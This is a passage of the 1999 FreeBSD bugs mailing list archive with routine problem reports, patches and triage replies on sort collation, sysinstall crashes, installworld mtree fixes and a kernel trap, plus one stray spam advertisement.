> ... > > >How-To-Repeat: > > happened to above hardwares. > > >Fix: > > > > > >Release-Note: > >Audit-Trail: > >Unformatted: > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 17:10: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2D44915151 for ; Tue, 21 Dec 1999 17:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA75705; Tue, 21 Dec 1999 17:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 17:10:03 -0800 (PST) Message-Id: <199912220110.RAA75705@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Andrey A. Chernov" Subject: Re: bin/15458: sort(1) doesn't sort correctly in some cases Reply-To: "Andrey A. Chernov" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15458; it has been noted by GNATS. From: "Andrey A. Chernov" To: cejkar@dcse.fee.vutbr.cz Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: bin/15458: sort(1) doesn't sort correctly in some cases Date: Tue, 21 Dec 1999 17:06:47 -0800 On Mon, Dec 13, 1999 at 02:01:02PM +0100, cejkar@dcse.fee.vutbr.cz wrote: > Sort(1) doesn't work in some cases for some locales. In cs_CZ.ISO_8859-2 > (will be shortly commited; maybe similar problem could be seen with es_ES) > there is collation definition: > > (H,h);\ > (CH,Ch,ch);\ > (I,i);\ > Here is my patch for /usr/src/gnu/usr.bin/sort/sort.c: It is general problem in GNU sort which compare strings character-by-character. Your patch not helps, if f.e. ignore case or skip blanks flags are given. Correct patch require big redesign of sort. Try to contact GNU sort maintainers first to ask them to fix this bug in future sort versions. -- Andrey A. Chernov http://nagual.pp.ru/~ache/ MTH/SH/HE S-- W-- N+ PEC>+ D A a++ C G>+ QH+(++) 666+>++ Y To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 18:30: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 00BAA14D08 for ; Tue, 21 Dec 1999 18:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA82215; Tue, 21 Dec 1999 18:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.vr.IN-Berlin.DE (gnu.in-berlin.de [192.109.42.4]) by hub.freebsd.org (Postfix) with ESMTP id 8865A150FC for ; Tue, 21 Dec 1999 18:21:32 -0800 (PST) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: from uriela.in-berlin.de (IDENT:root@servicia.in-berlin.de [192.109.42.145]) by mail.vr.IN-Berlin.DE (8.9.3/8.9.3) with ESMTP id DAA26569 for ; Wed, 22 Dec 1999 03:21:26 +0100 (CET) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: by uriela.in-berlin.de (Smail-3.2.0.101 1997-Dec-17 #1) id m120cyJ-000VRiC; Wed, 22 Dec 1999 05:01:55 +0100 (CET) Received: (from ripley@localhost) by server.nostromo.in-berlin.de (8.9.3/8.9.3) id DAA30166; Wed, 22 Dec 1999 03:20:02 +0100 (CET) (envelope-from ripley) Message-Id: <199912220220.DAA30166@server.nostromo.in-berlin.de> Date: Wed, 22 Dec 1999 03:20:02 +0100 (CET) From: "H. Eckert" Reply-To: ripley@nostromo.in-berlin.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/15616: /stand/sysinstall dumps core Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15616 >Category: i386 >Synopsis: /stand/sysinstall dumps core >Confidential: yes >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 18:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: H. Eckert >Release: FreeBSD 3.4-RELEASE >Organization: Individual Network e.V. >Environment: P133 with SCSI disk on NCR controller, DTTA 16 GB on IDE, 64MB MAtrox MGA graphics card, 10/100 NIC. FreeBSD 3.4-RELEASE install floppy images from 1999-12-20 >Description: During a fresh install I chose custom distribution set and the installation crashed. I installed the minimal set. On the running system, /stand/sysinstall crashes when selecting configure->distributions. I'll put a core dump image on ftp://bigfoot.mind.de/pub/FreeBSD/ >How-To-Repeat: Run /stand/sysinstall (as root), select configure, select distributions >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 18:50: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B74D114C0E for ; Tue, 21 Dec 1999 18:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA83841; Tue, 21 Dec 1999 18:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 18:50:03 -0800 (PST) Message-Id: <199912220250.SAA83841@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Jeremy Subject: Re: bin/10342: putenv(3) unnecessarily calls strdup/free Reply-To: Peter Jeremy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/10342; it has been noted by GNATS. From: Peter Jeremy To: freebsd-gnats-submit@FreeBSD.ORG Cc: Subject: Re: bin/10342: putenv(3) unnecessarily calls strdup/free Date: Wed, 22 Dec 1999 13:47:21 +1100 Since the correct fix is not clear, how about at least documenting the problem: Index: src/lib/libc/stdlib/getenv.3 =================================================================== RCS file: /home/CVSROOT/src/lib/libc/stdlib/getenv.3,v retrieving revision 1.3 diff -u -r1.3 getenv.3 --- getenv.3 1999/08/28 00:01:31 1.3 +++ getenv.3 1999/10/05 06:26:19 @@ -150,3 +150,13 @@ .Fn putenv function appeared in .Bx 4.3 Reno . +.Sh BUGS +Successive calls to +.Fn setenv +or +.Fn putenv +assigning a differently sized +.Ar value +to the same +.Ar name +will result in a memory leak. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 19:28: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A2BB014D24; Tue, 21 Dec 1999 19:28:00 -0800 (PST) (envelope-from jkh@FreeBSD.org) Received: (from jkh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA86504; Tue, 21 Dec 1999 19:28:00 -0800 (PST) (envelope-from jkh@FreeBSD.org) Date: Tue, 21 Dec 1999 19:28:00 -0800 (PST) From: Message-Id: <199912220328.TAA86504@freefall.freebsd.org> To: ripley@nostromo.in-berlin.de, jkh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/15616: /stand/sysinstall dumps core Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /stand/sysinstall dumps core State-Changed-From-To: open->closed State-Changed-By: jkh State-Changed-When: Tue Dec 21 19:27:35 PST 1999 State-Changed-Why: Fixed today by Jack O'Neill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 22: 0: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5220D151A7 for ; Tue, 21 Dec 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA97486; Tue, 21 Dec 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 6D80314CBF; Tue, 21 Dec 1999 21:59:23 -0800 (PST) Message-Id: <19991222055923.6D80314CBF@hub.freebsd.org> Date: Tue, 21 Dec 1999 21:59:23 -0800 (PST) From: yardley@uiuc.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15618: Makefile needs update for /usr/src Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15618 >Category: misc >Synopsis: Makefile needs update for /usr/src >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 22:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tim Yardley >Release: 3.4 >Organization: liquified.visions >Environment: FreeBSD solid.ncsa.uiuc.edu 3.4-RC FreeBSD 3.4-RC #4: Tue Dec 14 03:44:43 CST 1999 liquid@solid.ncsa.uiuc.edu:/usr/src/sys/compile/SOLID i386 >Description: The system hasnt been rebooted yet, but was cvsup'ed at like 11am on December 21st and the kernel was rebuilt. At that point, I also did a make world, however the make world fails when it tries installing stuff into /usr/share/examples/diskless. The reason for this is that the directory was not created by the Makefile. actual directories that need created: /usr/share/examples/diskless /usr/share/examples/diskless/209.157.86.12 /usr/share/examples/diskless/HT.DISKLESS /usr/share/examples/diskless/HT.STD >How-To-Repeat: go from 3.3 -> 3.4 >Fix: make the make installworld create that directory structure. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 23:20: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 831A515101 for ; Tue, 21 Dec 1999 23:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA04449; Tue, 21 Dec 1999 23:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CC38C150BC; Tue, 21 Dec 1999 23:14:46 -0800 (PST) Message-Id: <19991222071446.CC38C150BC@hub.freebsd.org> Date: Tue, 21 Dec 1999 23:14:46 -0800 (PST) From: deddingf@home.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15620: Trap 12 in kernel mode soon after files start to copy on installation. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15620 >Category: i386 >Synopsis: Trap 12 in kernel mode soon after files start to copy on installation. >Confidential: no >Severity: critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 23:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Duane Eddingfield >Release: 3.2, 3.3, 3.4 (RELEASE) >Organization: Private Site on @Home >Environment: >Description: The Problem: Boot from install floppies, use visual kernel to remove unneeded devices, set up for FTP install, connects to server copies 3 to 8 of the /bin distribution and then "panic: syncing disks..." etc. Fatal trap 12: page fault while in kernel mode fault virtual address = 0x7200720 fault code = supervisor read, page not present instruction pointer = 0x8:0xc023a19c stack pointer = 0x10:0xc5b95ddc frame pointer = 0x100xc5b95dec code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, press 1, def32 1, gran 1 processor eflags = interrrupt enabled, resume, IOPL = 0 current process = 4 (syncer) interrrupt mask = net tty bio cam trap number = 12 The hardware: DEC Prioris LX 5150. (Pentium 150, Adaptec 7850, 1 - Fujitsu M1608SAU harddisk, SONY CDU 76S CD-ROM with active terminator, 128 MB RAM, 2 - DC21040 net cards) This machine has never run enything but FreeBSD since 2.1.6 and did run 3.2 a few months ago. Things I have done: Checked and rechecked SCSI IDs, termination etc. Tried removing 64 MB of RAM, installed RAM in different combinations with contact cleaner. Installed OpenBSD2.6, rebuilt kernel, rebooted. Installed Pine from ports collection, played around with it for several days, OpenBSD works as good as ever. Tried installing 3.2 from CD-ROM, same result. >How-To-Repeat: Every install attempt. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 23:52: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from 216-119-34-248.o1.jps.net (216-119-34-248.o1.jps.net [216.119.34.248]) by hub.freebsd.org (Postfix) with SMTP id 8501F151C8 for ; Tue, 21 Dec 1999 23:52:02 -0800 (PST) (envelope-from support@allstarmultimedia.com) From: support@allstarmultimedia.com To: freebsd-bugs@freebsd.org Subject: FREE LONG DISTANCE ANYWHERE IN THE USA Date: Tue, 21 Dec 1999 23:51:03 -0800 X-Sender: support@allstarmultimedia.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 X-MSMail-Priority: Normal Message-Id: <19991222075202.8501F151C8@hub.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank you for your request for information On the NEW ITALK net pnones. Free long distance any were in the u.s.a. No lies, no joke, no charge. If you have a internet connection You can have FREE long distance Anywhere in the USA. For more information visit our web site www.allstarmultimrdia.com/italk.htm If you have received this email by mistake You can click on REMOVE and you will Be removed from our mailing list. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 1:51:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C4DFD14D08; Wed, 22 Dec 1999 01:51:40 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA18716; Wed, 22 Dec 1999 01:51:40 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Wed, 22 Dec 1999 01:51:40 -0800 (PST) From: Message-Id: <199912220951.BAA18716@freefall.freebsd.org> To: babolo@links.ru, asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15609: 3.4-install.iso unreadable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: 3.4-install.iso unreadable State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Wed Dec 22 01:50:16 PST 1999 State-Changed-Why: The permissions were set to -rw------- to be sure no-one was downloading it yet while it was being tested. It should be 644 by now. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 2:59:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3FBA314E0D; Wed, 22 Dec 1999 02:59:00 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA24177; Wed, 22 Dec 1999 02:59:00 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Wed, 22 Dec 1999 02:59:00 -0800 (PST) From: Message-Id: <199912221059.CAA24177@freefall.freebsd.org> To: yardley@uiuc.edu, asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15618: Makefile needs update for /usr/src Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Makefile needs update for /usr/src State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Wed Dec 22 02:58:03 PST 1999 State-Changed-Why: This has been fixed in rev 1.146.2.11 of src/etc/mtree/BSD.usr.dist of STABLE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 3:51: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E3B7C15021; Wed, 22 Dec 1999 03:51:02 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA29112; Wed, 22 Dec 1999 03:51:02 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Wed, 22 Dec 1999 03:51:02 -0800 (PST) From: Message-Id: <199912221151.DAA29112@freefall.freebsd.org> To: asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/15601: Selecting 'custom distribution' causes signal 11 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Selecting 'custom distribution' causes signal 11 Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: asmodai Responsible-Changed-When: Wed Dec 22 03:49:40 PST 1999 Responsible-Changed-Why: This is jkh's child. Although my test indicated that all previous sig 11 cases have been fixed, I cannot be certain about this (don't have a spare box handy at the moment). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 3:59:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 673051508A; Wed, 22 Dec 1999 03:59:49 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA30011; Wed, 22 Dec 1999 03:59:48 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Wed, 22 Dec 1999 03:59:48 -0800 (PST) From: Message-Id: <199912221159.DAA30011@freefall.freebsd.org> To: asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org, peter@FreeBSD.org Subject: Re: misc/15519: Lots of bind-8.2.2 manual pages don't get installed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Lots of bind-8.2.2 manual pages don't get installed Responsible-Changed-From-To: freebsd-bugs->peter Responsible-Changed-By: asmodai Responsible-Changed-When: Wed Dec 22 03:58:28 PST 1999 Responsible-Changed-Why: Peter was the person to import and co-ordinate the BIND 8.2.2-p5 release. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 6:18:56 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7DCE414EA3; Wed, 22 Dec 1999 06:18:53 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA44807; Wed, 22 Dec 1999 06:18:53 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Wed, 22 Dec 1999 06:18:53 -0800 (PST) From: Message-Id: <199912221418.GAA44807@freefall.freebsd.org> To: kehlet@techfuel.com, asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15615: 3.4 install program segfaults when you select "Custom" under Distributions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: 3.4 install program segfaults when you select "Custom" under Distributions State-Changed-From-To: open->closed State-Changed-By: asmodai State-Changed-When: Wed Dec 22 06:18:32 PST 1999 State-Changed-Why: Duplicate of PR 15601. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 6:20: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ED6871502A for ; Wed, 22 Dec 1999 06:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA44925; Wed, 22 Dec 1999 06:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 06:20:01 -0800 (PST) Message-Id: <199912221420.GAA44925@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Cejka Rudolf Subject: Re: bin/15458: sort(1) doesn't sort correctly in some cases Reply-To: Cejka Rudolf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15458; it has been noted by GNATS. From: Cejka Rudolf To: "Andrey A. Chernov" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15458: sort(1) doesn't sort correctly in some cases Date: Wed, 22 Dec 1999 15:18:22 +0100 Andrey A. Chernov wrote (1999/12/21): > It is general problem in GNU sort which compare strings character-by-character. > Your patch not helps, if f.e. ignore case or skip blanks flags are given. At this poing you are right. > Correct patch require big redesign of sort. Try to contact GNU sort > maintainers first to ask them to fix this bug in future sort versions. We should not contact GNU sort maintainers because this is FreeBSD specific problem: In our source tree there is a very old patched sort-1.14 and they have sort-2.0 already. And sort-2.0 works much better and hasn't this problem. So the best solution should be to import sort-2.0 from textutils-2.0. I have tried this and it looks it works: We have to configure textutils-2.0 with "configure --with-catgets" and copy-out these files: COPYING, intl/cat-compat.c, po/cat-id-tbl.c, lib/closeout.[ch], config.h, lib/error.[ch], lib/getopt.[ch], lib/getopt1.c, lib/hard-locale.[ch], intl/libgettext.h, intl/libintl.h, lib/long-options.[ch], lib/memcoll.[ch], man/sort.1, src/sort.c, src/sys2.h, src/system.h, lib/version-etc.[ch], lib/xalloc.h and lib/xmalloc.c. After this in Makefile we have to define all *.c as SRCS and add -DLOCALEDIR=\"/usr/share/nls\" and it works. But I expect another problems again there ;-) -- Rudolf Cejka (cejkar@dcse.fee.vutbr.cz; http://www.fee.vutbr.cz/~cejkar) Brno University of Technology, Faculty of El. Engineering and Comp. Science Bozetechova 2, 612 66 Brno, Czech Republic To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 8:38: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CB36A14DFA; Wed, 22 Dec 1999 08:38:02 -0800 (PST) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA13123; Wed, 22 Dec 1999 08:38:02 -0800 (PST) (envelope-from phk@FreeBSD.org) Date: Wed, 22 Dec 1999 08:38:02 -0800 (PST) From: Message-Id: <199912221638.IAA13123@freefall.freebsd.org> To: jegjr@erols.com, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15048: tcopy reports incorrect values Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: tcopy reports incorrect values State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Dec 22 08:36:04 PST 1999 State-Changed-Why: Since 9-track tapes dump has used a 10k blocksize as default. I'm not sure why it reports in 1k blocks, but know that changing the output format af dump affects many backup tools like amanda so inertia is very significant. Anyway, try to specify -b 1 to dump if you really want 1K block size. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 8:40:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2DBC515517; Wed, 22 Dec 1999 08:40:23 -0800 (PST) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA13676; Wed, 22 Dec 1999 08:40:23 -0800 (PST) (envelope-from phk@FreeBSD.org) Date: Wed, 22 Dec 1999 08:40:23 -0800 (PST) From: Message-Id: <199912221640.IAA13676@freefall.freebsd.org> To: phk@FreeBSD.org, freebsd-bugs@FreeBSD.org, mckusick@FreeBSD.org Subject: Re: kern/15063: "indirect pointer mismatch" in softdep Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: "indirect pointer mismatch" in softdep Responsible-Changed-From-To: freebsd-bugs->mckusick Responsible-Changed-By: phk Responsible-Changed-When: Wed Dec 22 08:39:46 PST 1999 Responsible-Changed-Why: Kirks department. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 8:50: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9077D15041 for ; Wed, 22 Dec 1999 08:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA14648; Wed, 22 Dec 1999 08:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 04B5314DD9 for ; Wed, 22 Dec 1999 08:42:58 -0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id LAA35923; Wed, 22 Dec 1999 11:47:36 -0500 (EST) (envelope-from cjc) Message-Id: <199912221647.LAA35923@cc942873-a.ewndsr1.nj.home.com> Date: Wed, 22 Dec 1999 11:47:36 -0500 (EST) From: "Crist J. Clark" Reply-To: cjc@cc942873-a.ewndsr1.nj.home.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15629: installworld fails due to absent dir: /usr/share/examples/diskless Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15629 >Category: misc >Synopsis: installworld fails due to absent dir: /usr/share/examples/diskless >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 08:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Crist J. Clark >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: Upgrading a FreeBSD 3.3-STABLE system (1999/10/24 build) to FreeBSD 3.4-STABLE (CVSup'ed evening of 1999/12/21). >Description: The installworld fails when an installation into a non-existent directory is attempted, . . . install -C -c -o root -g wheel -m 644 cvsup/standard-supfile /usr/share/examples/cvsup/standard-supfile install -C -c -o root -g wheel -m 644 cvsup/www-supfile /usr/share/examples/cvsup/www-supfile install -C -c -o root -g wheel -m 644 diskless/209.157.86.12/README /usr/share/examples/diskless/209.157.86.12/README install: mkstemp: /usr/share/examples/diskless/209.157.86.12/INS@8484 for /usr/share/examples/diskless/209.157.86.12/README: No such file or directory *** Error code 71 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. This directory, /usr/share/examples/diskless, was not created in the earlier stages of the make-world process since it does not seem to exist in mtree/BSD.usr.dist. >How-To-Repeat: # rm -r /usr/share/examples/diskless # cd /usr/src # make world >Fix: /usr/share/diskless should be added to the mtree, --- /usr/src/etc/mtree/BSD.usr.dist Sat Sep 11 20:09:29 1999 +++ BSD.usr.dist Wed Dec 22 11:41:08 1999 @@ -273,6 +273,14 @@ .. cvsup .. + diskless + 209.157.86.12 + .. + HT.DISKLESS + .. + HT.STD + .. + .. drivers .. etc >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 8:54: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 283771551B; Wed, 22 Dec 1999 08:54:06 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA14981; Wed, 22 Dec 1999 08:54:05 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 22 Dec 1999 08:54:05 -0800 (PST) From: Message-Id: <199912221654.IAA14981@freefall.freebsd.org> To: hg@penny.n2wx.ampr.org, sheldonh@FreeBSD.org, wollman@FreeBSD.org, 